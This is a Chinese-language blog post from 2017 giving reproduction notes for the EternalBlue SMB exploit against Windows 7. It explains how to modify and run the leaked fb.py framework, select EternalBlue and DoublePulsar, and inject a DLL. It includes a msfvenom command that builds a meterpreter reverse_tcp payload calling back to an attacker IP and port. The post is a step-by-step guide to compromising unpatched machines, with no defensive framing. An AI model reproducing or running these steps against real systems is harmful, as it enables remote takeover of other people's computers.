Windows SMB 0day复现笔记

作者: Luan 分类: 学习笔记 发布时间: 2017-04-15 16:45

测试环境

靶机

windows7 64位旗舰版

445 open

攻击机环境:

python2.6

pywin32

详细过程:

下载安装好。设置好py26的环境变量。

下载解压方程式的0day

fb.py有个地方需要修改一下:

第26,27,28行注释掉

还有第72行。

打开cmd切入windows目录。执行python fb.py

按照他的要求输入[默认]参数。

然后use Eternalblue,一路回车:

注意的是在这里选择1:

一路回车就可以看到succeeded了。

接着执行use Doublepulsar。

根据实际情况选择64位还是32位。

然后进入关键步骤:

选择运行dll文件,然后输入dll文件的路径,这个dll文件我是用msf生成的。

 

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.171 LPORT=6666 -f dll > msfx64.dll

 

如果是32位的就生成32位的,如果弄错了也没事,工具会利用失败,重来就可以了。

然后一路回车:

这样子就是成功了。看看msf:

 

 

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

5条评论

发表评论